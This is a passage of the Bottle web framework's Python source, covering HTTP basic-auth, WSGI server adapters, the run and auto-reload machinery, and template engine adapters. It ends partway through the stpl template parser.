def auth_basic(check, realm="private", text="Access denied"):
    ''' Callback decorator to require HTTP auth (basic).
        TODO: Add route(check_auth=...) parameter.

        :param check: callable check(user, password) -> bool
        :param realm: realm name announced in the WWW-Authenticate header
        :param text: body text of the 401 error response
    '''
    def decorator(func):
        def wrapper(*a, **ka):
            user, password = request.auth or (None, None)
            if user is None or not check(user, password):
                # Missing or bad credentials: challenge the client.
                err = HTTPError(401, text)
                err.add_header('WWW-Authenticate', 'Basic realm="%s"' % realm)
                return err
            return func(*a, **ka)
        return wrapper
    return decorator
# Shortcuts for common Bottle methods.
# They all refer to the current default application.
def make_default_app_wrapper(name):
    ''' Return a callable that relays calls to the current default app. '''
    @functools.wraps(getattr(Bottle, name))
    def wrapper(*a, **ka):
        # Resolve app() at call time so the *current* default app is used.
        return getattr(app(), name)(*a, **ka)
    return wrapper
# Module-level shortcuts bound to the *current* default application
# (resolved per call, see make_default_app_wrapper above).
route     = make_default_app_wrapper('route')
get       = make_default_app_wrapper('get')
post      = make_default_app_wrapper('post')
put       = make_default_app_wrapper('put')
delete    = make_default_app_wrapper('delete')
error     = make_default_app_wrapper('error')
mount     = make_default_app_wrapper('mount')
hook      = make_default_app_wrapper('hook')
install   = make_default_app_wrapper('install')
uninstall = make_default_app_wrapper('uninstall')
url       = make_default_app_wrapper('get_url')
###############################################################################
# Server Adapter ###############################################################
###############################################################################
class ServerAdapter(object):
    """ Base class for server adapters. Subclasses implement :meth:`run` to
        start a specific WSGI server with the given handler. """

    quiet = False  # suppress startup output when True

    def __init__(self, host='127.0.0.1', port=8080, **options):
        self.options = options
        self.host = host
        self.port = int(port)

    def run(self, handler):  # pragma: no cover
        pass

    def __repr__(self):
        kwargs = ', '.join('%s=%s' % (k, repr(v)) for k, v in self.options.items())
        return "%s(%s)" % (self.__class__.__name__, kwargs)
class CGIServer(ServerAdapter):
    """ Run the application once through the CGI protocol (wsgiref). """
    quiet = True
    def run(self, handler): # pragma: no cover
        from wsgiref.handlers import CGIHandler
        def fixed_environ(environ, start_response):
            # Some CGI environments omit PATH_INFO entirely; default it.
            environ.setdefault('PATH_INFO', '')
            return handler(environ, start_response)
        CGIHandler().run(fixed_environ)
class FlupFCGIServer(ServerAdapter):
    """ FastCGI server based on the flup package. """
    def run(self, handler): # pragma: no cover
        import flup.server.fcgi
        # Default to a TCP socket; callers may override bindAddress in options.
        self.options.setdefault('bindAddress', (self.host, self.port))
        flup.server.fcgi.WSGIServer(handler, **self.options).run()
class WSGIRefServer(ServerAdapter):
    """ Single-threaded wsgiref server.

        Patched variant: server creation is split out into :meth:`initialize`
        so the bound socket (and the actual port, when port 0 was requested)
        is available before :meth:`run` blocks in ``serve_forever``. """
    def __init__(self, *args, **kargs):
        super(WSGIRefServer, self).__init__(*args, **kargs)
        self.server = None  # created lazily by initialize()
    def initialize(self, app):
        from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
        from wsgiref.simple_server import make_server
        import socket
        class FixedHandler(WSGIRequestHandler):
            def address_string(self): # Prevent reverse DNS lookups please.
                return self.client_address[0]
            def log_request(*args, **kw):
                # Only log when the adapter is not in quiet mode.
                if not self.quiet:
                    return WSGIRequestHandler.log_request(*args, **kw)
        handler_cls = self.options.get('handler_class', FixedHandler)
        server_cls = self.options.get('server_class', WSGIServer)
        if ':' in self.host: # Fix wsgiref for IPv6 addresses.
            if getattr(server_cls, 'address_family') == socket.AF_INET:
                class server_cls(server_cls):
                    address_family = socket.AF_INET6
        self.server = make_server(self.host,
                                  self.port,
                                  app,
                                  server_cls,
                                  handler_cls)
        # Reflect the actually bound port (useful when port 0 was requested).
        self.port = self.server.server_port
    def run(self, app): # pragma: no cover
        if self.server is None:
            self.initialize(app)
        assert self.server is not None
        self.server.serve_forever()
class CherryPyServer(ServerAdapter):
    """ Multi-threaded CherryPy WSGI server. Supports SSL through the
        'certfile' and 'keyfile' options. """
    def run(self, handler): # pragma: no cover
        from cherrypy import wsgiserver
        self.options['bind_addr'] = (self.host, self.port)
        self.options['wsgi_app'] = handler
        # SSL options are consumed here and applied to the server object
        # below; they must not be passed to CherryPyWSGIServer itself.
        certfile = self.options.get('certfile')
        if certfile:
            del self.options['certfile']
        keyfile = self.options.get('keyfile')
        if keyfile:
            del self.options['keyfile']
        server = wsgiserver.CherryPyWSGIServer(**self.options)
        if certfile:
            server.ssl_certificate = certfile
        if keyfile:
            server.ssl_private_key = keyfile
        try:
            server.start()
        finally:
            server.stop()
class WaitressServer(ServerAdapter):
    """ Pure-python, multi-threaded waitress server. """
    def run(self, handler):
        from waitress import serve
        serve(handler, host=self.host, port=self.port)
class PasteServer(ServerAdapter):
    """ Multi-threaded Paste httpserver with Apache-style request logging. """
    def run(self, handler): # pragma: no cover
        from paste import httpserver
        from paste.translogger import TransLogger
        # Wrap the app in an access logger unless the adapter is quiet.
        handler = TransLogger(handler, setup_console_handler=(not self.quiet))
        httpserver.serve(handler, host=self.host, port=str(self.port),
                         **self.options)
class MeinheldServer(ServerAdapter):
    """ Asynchronous server based on the meinheld C extension. """
    def run(self, handler):
        from meinheld import server
        server.listen((self.host, self.port))
        server.run(handler)
class FapwsServer(ServerAdapter):
    """ Extremely fast webserver using libev. See http://www.fapws.org/ """
    def run(self, handler): # pragma: no cover
        import fapws._evwsgi as evwsgi
        from fapws import base, config
        port = self.port
        if float(config.SERVER_IDENT[-2:]) > 0.4:
            # fapws3 silently changed its API in 0.5
            port = str(port)
        evwsgi.start(self.host, port)
        # fapws3 never releases the GIL. Complain upstream. I tried. No luck.
        if 'BOTTLE_CHILD' in os.environ and not self.quiet:
            _stderr("WARNING: Auto-reloading does not work with Fapws3.\n")
            _stderr("         (Fapws3 breaks python thread support)\n")
        evwsgi.set_base_module(base)
        def app(environ, start_response):
            # fapws is single-process; advertise that to the WSGI app.
            environ['wsgi.multiprocess'] = False
            return handler(environ, start_response)
        evwsgi.wsgi_cb(('', app))
        evwsgi.run()
class TornadoServer(ServerAdapter):
    """ The super hyped asynchronous server by facebook. Untested. """
    def run(self, handler): # pragma: no cover
        import tornado.wsgi, tornado.httpserver, tornado.ioloop
        container = tornado.wsgi.WSGIContainer(handler)
        server = tornado.httpserver.HTTPServer(container)
        server.listen(port=self.port,address=self.host)
        # Blocks until the IOLoop is stopped.
        tornado.ioloop.IOLoop.instance().start()
class AppEngineServer(ServerAdapter):
    """ Adapter for Google App Engine (uses the webapp util runner). """
    quiet = True
    def run(self, handler):
        from google.appengine.ext.webapp import util
        # A main() function in the handler script enables 'App Caching'.
        # Lets makes sure it is there. This _really_ improves performance.
        module = sys.modules.get('__main__')
        if module and not hasattr(module, 'main'):
            module.main = lambda: util.run_wsgi_app(handler)
        util.run_wsgi_app(handler)
class TwistedServer(ServerAdapter):
    """ Untested. Runs the WSGI app in a twisted thread pool. """
    def run(self, handler):
        from twisted.web import server, wsgi
        from twisted.python.threadpool import ThreadPool
        from twisted.internet import reactor
        thread_pool = ThreadPool()
        thread_pool.start()
        # Make sure worker threads are stopped when the reactor shuts down.
        reactor.addSystemEventTrigger('after', 'shutdown', thread_pool.stop)
        factory = server.Site(wsgi.WSGIResource(reactor, thread_pool, handler))
        reactor.listenTCP(self.port, factory, interface=self.host)
        reactor.run()
class DieselServer(ServerAdapter):
    """ Untested. """
    def run(self, handler):
        from diesel.protocols.wsgi import WSGIApplication
        # Note: only the port is configurable here; 'host' is ignored.
        app = WSGIApplication(handler, port=self.port)
        app.run()
class GeventServer(ServerAdapter):
    """ Untested. Options:

        * `fast` (default: False) uses libevent's http server, but has some
          issues: No streaming, no pipelining, no SSL.
        * See gevent.wsgi.WSGIServer() documentation for more options.
    """
    def run(self, handler):
        from gevent import wsgi, pywsgi, local
        # threading.local() must be gevent's greenlet-local replacement;
        # otherwise monkey-patching did not happen (or happened too late).
        if not isinstance(threading.local(), local.local):
            msg = "Bottle requires gevent.monkey.patch_all() (before import)"
            raise RuntimeError(msg)
        if not self.options.pop('fast', None): wsgi = pywsgi
        self.options['log'] = None if self.quiet else 'default'
        address = (self.host, self.port)
        server = wsgi.WSGIServer(address, handler, **self.options)
        if 'BOTTLE_CHILD' in os.environ:
            # Let the auto-reloader stop the server gracefully on SIGINT.
            import signal
            signal.signal(signal.SIGINT, lambda s, f: server.stop())
        server.serve_forever()
class GeventSocketIOServer(ServerAdapter):
    """ SocketIO-capable server from the gevent-socketio package. """
    def run(self,handler):
        from socketio import server
        address = (self.host, self.port)
        server.SocketIOServer(address, handler, **self.options).serve_forever()
class GunicornServer(ServerAdapter):
    """ Untested. See http://gunicorn.org/configure.html for options. """
    def run(self, handler):
        from gunicorn.app.base import Application
        config = {'bind': "%s:%d" % (self.host, int(self.port))}
        config.update(self.options)
        class GunicornApplication(Application):
            # Gunicorn pulls its configuration from init() ...
            def init(self, parser, opts, args):
                return config
            # ... and the WSGI callable from load().
            def load(self):
                return handler
        GunicornApplication().run()
class EventletServer(ServerAdapter):
    """ Untested """
    def run(self, handler):
        from eventlet import wsgi, listen
        try:
            wsgi.server(listen((self.host, self.port)), handler,
                        log_output=(not self.quiet))
        except TypeError:
            # Fallback, if we have old version of eventlet
            # (older versions do not accept the log_output keyword)
            wsgi.server(listen((self.host, self.port)), handler)
class RocketServer(ServerAdapter):
    """ Untested. """
    def run(self, handler):
        from rocket import Rocket
        server = Rocket((self.host, self.port), 'wsgi', { 'wsgi_app' : handler })
        # start() blocks until the server is stopped.
        server.start()
class BjoernServer(ServerAdapter):
    """ Fast server written in C: https://github.com/jonashaag/bjoern """
    def run(self, handler):
        from bjoern import run
        # run() blocks until the server is interrupted.
        run(handler, self.host, self.port)
class AutoServer(ServerAdapter):
    """ Try each adapter in :attr:`adapters` (in order) and run the first one
        whose server package can be imported. """
    adapters = [WaitressServer, PasteServer, TwistedServer, CherryPyServer, WSGIRefServer]
    def run(self, handler):
        for sa in self.adapters:
            try:
                return sa(self.host, self.port, **self.options).run(handler)
            except ImportError:
                pass  # server package not installed: try the next adapter
#: Map of server names (as accepted by run(server=...)) to adapter classes.
server_names = {
    'cgi': CGIServer,
    'flup': FlupFCGIServer,
    'wsgiref': WSGIRefServer,
    'waitress': WaitressServer,
    'cherrypy': CherryPyServer,
    'paste': PasteServer,
    'fapws3': FapwsServer,
    'tornado': TornadoServer,
    'gae': AppEngineServer,
    'twisted': TwistedServer,
    'diesel': DieselServer,
    'meinheld': MeinheldServer,
    'gunicorn': GunicornServer,
    'eventlet': EventletServer,
    'gevent': GeventServer,
    'geventSocketIO':GeventSocketIOServer,
    'rocket': RocketServer,
    'bjoern' : BjoernServer,
    'auto': AutoServer,
}
###############################################################################
# Application Control ##########################################################
###############################################################################
def load(target, **namespace):
    """ Import a module or fetch an object from a module.

        * ``package.module`` returns `module` as a module object.
        * ``pack.mod:name`` returns the module variable `name` from `pack.mod`.
        * ``pack.mod:func()`` calls `pack.mod.func()` and returns the result.

        The last form accepts not only function calls, but any type of
        expression. Keyword arguments passed to this function are available as
        local variables. Example: ``import_string('re:compile(x)', x='[a-z]')``
    """
    if ':' in target:
        module, target = target.split(':', 1)
    else:
        module, target = target, None
    if module not in sys.modules:
        __import__(module)
    if not target:
        return sys.modules[module]
    if target.isalnum():
        # Plain identifier: a simple attribute lookup is enough.
        return getattr(sys.modules[module], target)
    # Anything else is evaluated as an expression with the top-level package
    # and the given keyword arguments in scope.
    package_name = module.split('.')[0]
    namespace[package_name] = sys.modules[package_name]
    return eval('%s.%s' % (module, target), namespace)
def load_app(target):
    """ Load a bottle application from a module and make sure that the import
        does not affect the current default application, but returns a separate
        application object. See :func:`load` for the target parameter. """
    global NORUN; NORUN, nr_old = True, NORUN  # suppress run() during the import
    try:
        tmp = default_app.push() # Create a new "default application"
        rv = load(target) # Import the target module
        # Prefer an explicitly returned callable; otherwise use the app that
        # the module registered routes on while it was the default.
        return rv if callable(rv) else tmp
    finally:
        default_app.remove(tmp) # Remove the temporary added default application
        NORUN = nr_old
_debug = debug  # preserved reference: create_server()'s 'debug' parameter shadows the function name
def create_server(app=None, server='wsgiref',
                  host='127.0.0.1', port=8080,
                  plugins=None,
                  debug=None, **kargs):
    """ Build and return a :class:`ServerAdapter` instance without starting it.

        :param app: WSGI application or target string supported by
               :func:`load_app`. (default: :func:`default_app`)
        :param server: Adapter name from :data:`server_names`, an import
               string, an adapter class or a ready-made adapter instance.
        :param host: Server address to bind to.
        :param port: Server port to bind to.
        :param plugins: Iterable of plugins to install into the application.
        :param debug: If not None, set the global debug mode first.
        :param kargs: Extra options passed to the server adapter.
        :raises ValueError: if the app is not callable or the server is not
               a known/supported adapter.
    """
    if debug is not None: _debug(debug)
    app = app or default_app()
    if isinstance(app, basestring):
        app = load_app(app)
    if not callable(app):
        raise ValueError("Application is not callable: %r" % app)

    for plugin in plugins or []:
        app.install(plugin)

    if server in server_names:
        server = server_names.get(server)
    if isinstance(server, basestring):
        server = load(server)
    if isinstance(server, type):
        server = server(host=host, port=port, **kargs)
    if not isinstance(server, ServerAdapter):
        raise ValueError("Unknown or unsupported server: %r" % server)

    # Bugfix: only the patched WSGIRefServer defines initialize(); calling it
    # unconditionally raised AttributeError for every other adapter.
    if hasattr(server, 'initialize'):
        server.initialize(app)
    return server
def run(app=None, server='wsgiref', host='127.0.0.1', port=8080,
        interval=1, reloader=False, quiet=False, plugins=None,
        debug=None, **kargs):
    """ Start a server instance. This method blocks until the server terminates.

        :param app: WSGI application or target string supported by
               :func:`load_app`. (default: :func:`default_app`)
        :param server: Server adapter to use. See :data:`server_names` keys
               for valid names or pass a :class:`ServerAdapter` subclass.
               (default: `wsgiref`)
        :param host: Server address to bind to. Pass ``0.0.0.0`` to listens on
               all interfaces including the external one. (default: 127.0.0.1)
        :param port: Server port to bind to. Values below 1024 require root
               privileges. (default: 8080)
        :param reloader: Start auto-reloading server? (default: False)
        :param interval: Auto-reloader interval in seconds (default: 1)
        :param quiet: Suppress output to stdout and stderr? (default: False)
        :param options: Options passed to the server adapter.
     """
    if NORUN: return
    # Reloader parent process: spawn a child running the same script with
    # BOTTLE_CHILD set, and restart it whenever it exits with status 3.
    if reloader and not os.environ.get('BOTTLE_CHILD'):
        try:
            lockfile = None
            fd, lockfile = tempfile.mkstemp(prefix='bottle.', suffix='.lock')
            os.close(fd) # We only need this file to exist. We never write to it
            while os.path.exists(lockfile):
                args = [sys.executable] + sys.argv
                environ = os.environ.copy()
                environ['BOTTLE_CHILD'] = 'true'
                environ['BOTTLE_LOCKFILE'] = lockfile
                p = subprocess.Popen(args, env=environ)
                while p.poll() is None: # Busy wait...
                    os.utime(lockfile, None) # I am alive!
                    time.sleep(interval)
                # Exit status 3 means "reload requested"; anything else ends
                # the parent with the child's status.
                if p.poll() != 3:
                    if os.path.exists(lockfile): os.unlink(lockfile)
                    sys.exit(p.poll())
        except KeyboardInterrupt:
            pass
        finally:
            if os.path.exists(lockfile):
                os.unlink(lockfile)
        return

    try:
        server = create_server(app, server,
                               host, port,
                               plugins, debug,
                               **kargs)
        server.quiet = server.quiet or quiet
        if not server.quiet:
            _stderr("Bottle v%s server starting up (using %s)...\n" % (__version__, repr(server)))
            _stderr("Listening on http://%s:%d/\n" % (server.host, server.port))
            _stderr("Hit Ctrl-C to quit.\n\n")
            # Output to stderr can get stuck in the buffer. Flush stderr
            # to ensure the above lines are written immediately.
            sys.stderr.flush()

        if reloader:
            # Reloader child process: watch module files and the lockfile.
            lockfile = os.environ.get('BOTTLE_LOCKFILE')
            bgcheck = FileCheckerThread(lockfile, interval)
            with bgcheck:
                server.run(app)
            if bgcheck.status == 'reload':
                sys.exit(3)
        else:
            server.run(app)
    except KeyboardInterrupt:
        pass
    except (SystemExit, MemoryError):
        raise
    except:
        if not reloader: raise
        if not getattr(server, 'quiet', quiet):
            print_exc()
        # Keep the child alive briefly, then ask the parent for a restart.
        time.sleep(interval)
        sys.exit(3)
class FileCheckerThread(threading.Thread):
    ''' Interrupt main-thread as soon as a changed module file is detected,
        the lockfile gets deleted or gets too old. '''

    def __init__(self, lockfile, interval):
        threading.Thread.__init__(self)
        self.lockfile, self.interval = lockfile, interval
        #: Is one of 'reload', 'error' or 'exit'
        self.status = None

    def run(self):
        exists = os.path.exists
        mtime = lambda path: os.stat(path).st_mtime
        files = dict()
        # Snapshot the mtimes of all currently imported module source files.
        for module in list(sys.modules.values()):
            path = getattr(module, '__file__', '')
            if path[-4:] in ('.pyo', '.pyc'): path = path[:-1]
            if path and exists(path): files[path] = mtime(path)

        while not self.status:
            # A missing or stale lockfile means the parent process died.
            if not exists(self.lockfile)\
            or mtime(self.lockfile) < time.time() - self.interval - 5:
                self.status = 'error'
                thread.interrupt_main()
            for path, lmtime in list(files.items()):
                if not exists(path) or mtime(path) > lmtime:
                    self.status = 'reload'
                    thread.interrupt_main()
                    break
            time.sleep(self.interval)

    def __enter__(self):
        self.start()

    def __exit__(self, exc_type, exc_val, exc_tb):
        if not self.status: self.status = 'exit' # silent exit
        self.join()
        # Swallow the KeyboardInterrupt raised by interrupt_main().
        return exc_type is not None and issubclass(exc_type, KeyboardInterrupt)
###############################################################################
# Template Adapters ############################################################
###############################################################################
class TemplateError(HTTPError):
    """ Template lookup or preparation failed; reported as an HTTP 500. """

    def __init__(self, message):
        super(TemplateError, self).__init__(500, message)
class BaseTemplate(object):
    """ Base class and minimal API for template adapters """
    extensions = ['tpl','html','thtml','stpl'] #: extensions tried by search()
    settings = {} #used in prepare()
    defaults = {} #used in render()
    def __init__(self, source=None, name=None, lookup=[], encoding='utf8', **settings):
        """ Create a new template.
        If the source parameter (str or buffer) is missing, the name argument
        is used to guess a template filename. Subclasses can assume that
        self.source and/or self.filename are set. Both are strings.
        The lookup, encoding and settings parameters are stored as instance
        variables.
        The lookup parameter stores a list containing directory paths.
        The encoding parameter should be used to decode byte strings or files.
        The settings parameter contains a dict for engine-specific settings.

        :raises TemplateError: if neither source nor a resolvable name is given.
        """
        self.name = name
        # A file-like source is read eagerly; otherwise it is kept as-is.
        self.source = source.read() if hasattr(source, 'read') else source
        self.filename = source.filename if hasattr(source, 'filename') else None
        self.lookup = [os.path.abspath(x) for x in lookup]
        self.encoding = encoding
        self.settings = self.settings.copy() # Copy from class variable
        self.settings.update(settings) # Apply
        if not self.source and self.name:
            # No inline source: resolve the name to a file via the lookup path.
            self.filename = self.search(self.name, self.lookup)
            if not self.filename:
                raise TemplateError('Template %s not found.' % repr(name))
        if not self.source and not self.filename:
            raise TemplateError('No template specified.')
        self.prepare(**self.settings)
    @classmethod
    def search(cls, name, lookup=[]):
        """ Search name in all directories specified in lookup.
        First without, then with common extensions. Return first hit.
        Returns None when nothing matches. """
        if not lookup:
            depr('The template lookup path list should not be empty.', True) #0.12
            lookup = ['.']
        if os.path.isabs(name) and os.path.isfile(name):
            depr('Absolute template path names are deprecated.', True) #0.12
            return os.path.abspath(name)
        for spath in lookup:
            spath = os.path.abspath(spath) + os.sep
            fname = os.path.abspath(os.path.join(spath, name))
            # Skip names that escape the lookup directory (e.g. '../secret').
            if not fname.startswith(spath): continue
            if os.path.isfile(fname): return fname
            for ext in cls.extensions:
                if os.path.isfile('%s.%s' % (fname, ext)):
                    return '%s.%s' % (fname, ext)
    @classmethod
    def global_config(cls, key, *args):
        ''' This reads or sets the global settings stored in class.settings.
            With one argument, returns settings[key]; with two, sets it
            (copy-on-write so subclasses do not mutate the parent dict). '''
        if args:
            cls.settings = cls.settings.copy() # Make settings local to class
            cls.settings[key] = args[0]
        else:
            return cls.settings[key]
    def prepare(self, **options):
        """ Run preparations (parsing, caching, ...).
        It should be possible to call this again to refresh a template or to
        update settings.
        """
        raise NotImplementedError
    def render(self, *args, **kwargs):
        """ Render the template with the specified local variables and return
        a single byte or unicode string. If it is a byte string, the encoding
        must match self.encoding. This method must be thread-safe!
        Local variables may be provided in dictionaries (args)
        or directly, as keywords (kwargs).
        """
        raise NotImplementedError
class MakoTemplate(BaseTemplate):
    """ Adapter for the Mako template engine. """

    def prepare(self, **options):
        from mako.template import Template
        from mako.lookup import TemplateLookup
        # Force the configured input encoding and enable pretty exception
        # pages while bottle runs in debug mode (unless overridden).
        options['input_encoding'] = self.encoding
        options.setdefault('format_exceptions', bool(DEBUG))
        lookup = TemplateLookup(directories=self.lookup, **options)
        if self.source:
            self.tpl = Template(self.source, lookup=lookup, **options)
        else:
            self.tpl = Template(uri=self.name, filename=self.filename,
                                lookup=lookup, **options)

    def render(self, *args, **kwargs):
        for dictarg in args:
            kwargs.update(dictarg)
        variables = self.defaults.copy()
        variables.update(kwargs)
        return self.tpl.render(**variables)
class CheetahTemplate(BaseTemplate):
    """ Adapter for the Cheetah template engine. """

    def prepare(self, **options):
        from Cheetah.Template import Template
        # A thread-local variable store keeps concurrent renders isolated.
        self.context = threading.local()
        self.context.vars = {}
        options['searchList'] = [self.context.vars]
        if self.source:
            self.tpl = Template(source=self.source, **options)
        else:
            self.tpl = Template(file=self.filename, **options)

    def render(self, *args, **kwargs):
        for dictarg in args:
            kwargs.update(dictarg)
        # Publish variables through the thread-local search list, render,
        # then clear them so the shared template instance stays stateless.
        self.context.vars.update(self.defaults)
        self.context.vars.update(kwargs)
        result = str(self.tpl)
        self.context.vars.clear()
        return result
class Jinja2Template(BaseTemplate):
    """ Adapter for the Jinja2 template engine. """

    def prepare(self, filters=None, tests=None, globals={}, **kwargs):
        from jinja2 import Environment, FunctionLoader
        # The FunctionLoader delegates template lookup to self.loader below.
        self.env = Environment(loader=FunctionLoader(self.loader), **kwargs)
        if filters:
            self.env.filters.update(filters)
        if tests:
            self.env.tests.update(tests)
        if globals:
            self.env.globals.update(globals)
        if self.source:
            self.tpl = self.env.from_string(self.source)
        else:
            self.tpl = self.env.get_template(self.filename)

    def render(self, *args, **kwargs):
        for dictarg in args:
            kwargs.update(dictarg)
        variables = self.defaults.copy()
        variables.update(kwargs)
        return self.tpl.render(**variables)

    def loader(self, name):
        """ Resolve and read a template source for Jinja2's FunctionLoader. """
        fname = self.search(name, self.lookup)
        if not fname:
            return
        with open(fname, "rb") as f:
            return f.read().decode(self.encoding)
class SimpleTemplate(BaseTemplate):
    """ Adapter for bottle's built-in stpl template engine. """

    def prepare(self, escape_func=html_escape, noescape=False, syntax=None, **ka):
        """ Set up encoding/escaping helpers and optional custom syntax.

            :param escape_func: callable used to escape rendered expressions.
            :param noescape: if true, swap the helpers so ``{{x}}`` does NOT
                             escape by default (and ``{{!x}}`` does).
            :param syntax: custom token syntax string passed to StplParser.
        """
        self.cache = {}  # templates pulled in via include/rebase, by name
        enc = self.encoding
        self._str = lambda x: touni(x, enc)
        self._escape = lambda x: escape_func(touni(x, enc))
        self.syntax = syntax
        if noescape:
            self._str, self._escape = self._escape, self._str

    @cached_property
    def co(self):
        """ Compiled code object for the translated template source. """
        return compile(self.code, self.filename or '<string>', 'exec')

    @cached_property
    def code(self):
        """ Python source code translated from the template text. """
        if self.source:
            source = self.source
        else:
            # Use a context manager so the file handle is closed promptly
            # instead of leaking until garbage collection.
            with open(self.filename, 'rb') as fp:
                source = fp.read()
        try:
            source, encoding = touni(source), 'utf8'
        except UnicodeError:
            depr('Template encodings other than utf8 are no longer supported.') #0.11
            source, encoding = touni(source, 'latin1'), 'latin1'
        parser = StplParser(source, encoding=encoding, syntax=self.syntax)
        code = parser.translate()
        self.encoding = parser.encoding
        return code

    def _rebase(self, _env, _name=None, **kwargs):
        # Only record the base template here; it is rendered in execute()
        # after the child template has produced its output.
        _env['_rebase'] = (_name, kwargs)

    def _include(self, _env, _name=None, **kwargs):
        # Render another template with a copy of the current environment,
        # caching the sub-template instance for reuse.
        env = _env.copy()
        env.update(kwargs)
        if _name not in self.cache:
            self.cache[_name] = self.__class__(name=_name, lookup=self.lookup)
        return self.cache[_name].execute(env['_stdout'], env)

    def execute(self, _stdout, kwargs):
        """ Execute the compiled template; output is appended to _stdout. """
        env = self.defaults.copy()
        env.update(kwargs)
        env.update({'_stdout': _stdout, '_printlist': _stdout.extend,
            'include': functools.partial(self._include, env),
            'rebase': functools.partial(self._rebase, env), '_rebase': None,
            '_str': self._str, '_escape': self._escape, 'get': env.get,
            'setdefault': env.setdefault, 'defined': env.__contains__ })
        eval(self.co, env)
        if env.get('_rebase'):
            subtpl, rargs = env.pop('_rebase')
            rargs['base'] = ''.join(_stdout) #copy stdout
            del _stdout[:] # clear stdout
            return self._include(env, subtpl, **rargs)
        return env

    def render(self, *args, **kwargs):
        """ Render the template using keyword arguments as local variables. """
        env = {}; stdout = []
        for dictarg in args: env.update(dictarg)
        env.update(kwargs)
        self.execute(stdout, env)
        return ''.join(stdout)
class StplSyntaxError(TemplateError):
    """ Raised for syntax errors found while parsing an stpl template. """
class StplParser(object):
    ''' Parser for stpl templates.

        Translates template text into Python source code. A parser instance
        is single-use: create one per translate() call. '''
    _re_cache = {} #: Cache for compiled re patterns
    # This huge pile of voodoo magic splits python code into 8 different tokens.
    # 1: All kinds of python strings (trust me, it works)
    _re_tok = '((?m)[urbURB]?(?:\'\'(?!\')|""(?!")|\'{6}|"{6}' \
              '|\'(?:[^\\\\\']|\\\\.)+?\'|"(?:[^\\\\"]|\\\\.)+?"' \
              '|\'{3}(?:[^\\\\]|\\\\.|\\n)+?\'{3}' \
              '|"{3}(?:[^\\\\]|\\\\.|\\n)+?"{3}))'
    _re_inl = _re_tok.replace('|\\n','') # We re-use this string pattern later
    # 2: Comments (until end of line, but not the newline itself)
    _re_tok += '|(#.*)'
    # 3,4: Keywords that start or continue a python block (only start of line)
    _re_tok += '|^([ \\t]*(?:if|for|while|with|try|def|class)\\b)' \
               '|^([ \\t]*(?:elif|else|except|finally)\\b)'
    # 5: Our special 'end' keyword (but only if it stands alone)
    _re_tok += '|((?:^|;)[ \\t]*end[ \\t]*(?=(?:%(block_close)s[ \\t]*)?\\r?$|;|#))'
    # 6: A customizable end-of-code-block template token (only end of line)
    _re_tok += '|(%(block_close)s[ \\t]*(?=$))'
    # 7: And finally, a single newline. The 8th token is 'everything else'
    _re_tok += '|(\\r?\\n)'
    # Match the start tokens of code areas in a template
    _re_split = '(?m)^[ \t]*(\\\\?)((%(line_start)s)|(%(block_start)s))'
    # Match inline statements (may contain python strings)
    _re_inl = '%%(inline_start)s((?:%s|[^\'"\n]*?)+)%%(inline_end)s' % _re_inl
    default_syntax = '<% %> % {{ }}'
    def __init__(self, source, syntax=None, encoding='utf8'):
        """ Decode the template source and reset all parser state. """
        self.source, self.encoding = touni(source, encoding), encoding
        self.set_syntax(syntax or self.default_syntax)
        # code_buffer collects translated Python lines; text_buffer collects
        # pending literal template text until the next flush_text().
        self.code_buffer, self.text_buffer = [], []
        self.lineno, self.offset = 1, 0
        self.indent, self.indent_mod = 0, 0
    def get_syntax(self):
        ''' Tokens as a space separated string (default: <% %> % {{ }}) '''
        return self._syntax
    def set_syntax(self, syntax):
        ''' Set the syntax string, compiling (and caching) its patterns. '''
        self._syntax = syntax
        self._tokens = syntax.split()
        if not syntax in self._re_cache:
            names = 'block_start block_close line_start inline_start inline_end'
            etokens = map(re.escape, self._tokens)
            pattern_vars = dict(zip(names.split(), etokens))
            patterns = (self._re_split, self._re_tok, self._re_inl)
            patterns = [re.compile(p%pattern_vars) for p in patterns]
            self._re_cache[syntax] = patterns
        self.re_split, self.re_tok, self.re_inl = self._re_cache[syntax]
    syntax = property(get_syntax, set_syntax)
    def translate(self):
        ''' Translate the whole template and return the Python source. '''
        if self.offset: raise RuntimeError('Parser is a one time instance.')
        while True:
            m = self.re_split.search(self.source[self.offset:])
            if m:
                # Everything before the code marker is literal text.
                text = self.source[self.offset:self.offset+m.start()]
                self.text_buffer.append(text)
                self.offset += m.end()
                if m.group(1): # Escape syntax
                    # A backslash before the marker keeps it literal.
                    line, sep, _ = self.source[self.offset:].partition('\n')
                    self.text_buffer.append(m.group(2)+line+sep)
                    self.offset += len(line+sep)+1
                    continue
                self.flush_text()
                self.read_code(multiline=bool(m.group(4)))
            else: break
        self.text_buffer.append(self.source[self.offset:])
        self.flush_text()
        return ''.join(self.code_buffer)
    def read_code(self, multiline):
        ''' Consume one code line (or a <% ... %> block when multiline)
            token by token, emitting translated lines via write_code(). '''
        code_line, comment, start_line = '', '', self.lineno
        while True:
            m = self.re_tok.search(self.source[self.offset:])
            if not m:
                # No more tokens: the rest of the source is code.
                code_line += self.source[self.offset:]
                self.offset = len(self.source)
                self.write_code(code_line.strip(), comment)
                return
            code_line += self.source[self.offset:self.offset+m.start()]
            self.offset += m.end()
            _str, _com, _blk1, _blk2, _end, _cend, _nl = m.groups()
            if _str: # Python string
                code_line += _str
            elif _com: # Python comment (up to EOL)
                comment = _com
                if multiline and _com.strip().endswith(self._tokens[1]):
                    multiline = False # Allow end-of-block in comments
            elif _blk1: # Start-block keyword (if/for/while/def/try/...)
                code_line, self.indent_mod = _blk1, -1
                self.indent += 1
            elif _blk2: # Continue-block keyword (else/elif/except/...)
                code_line, self.indent_mod = _blk2, -1
            elif _end: # The non-standard 'end'-keyword (ends a block)
                self.indent -= 1
            elif _cend: # The end-code-block template token (usually '%>')
                if multiline: multiline = False
                else: code_line += _cend
            else: # \n
                self.write_code(code_line.strip(), comment)
                self.lineno += 1
                code_line, comment, self.indent_mod = '', '', 0
                if not multiline:
                    break
    def flush_text(self):
        ''' Emit the buffered literal text as one _printlist(...) call. '''
        text = ''.join(self.text_buffer)
        del self.text_buffer[:]
        if not text: return
        parts, pos, nl = [], 0, '\\\n'+'  '*self.indent
        for m in self.re_inl.finditer(text):
            # Literal prefix before the inline expression, then the
            # (escaped or raw) expression itself.
            prefix, pos = text[pos:m.start()], m.end()
            if prefix:
                parts.append(nl.join(map(repr, prefix.splitlines(True))))
            if prefix.endswith('\n'): parts[-1] += nl
            parts.append(self.process_inline(m.group(1).strip()))
        if pos < len(text):
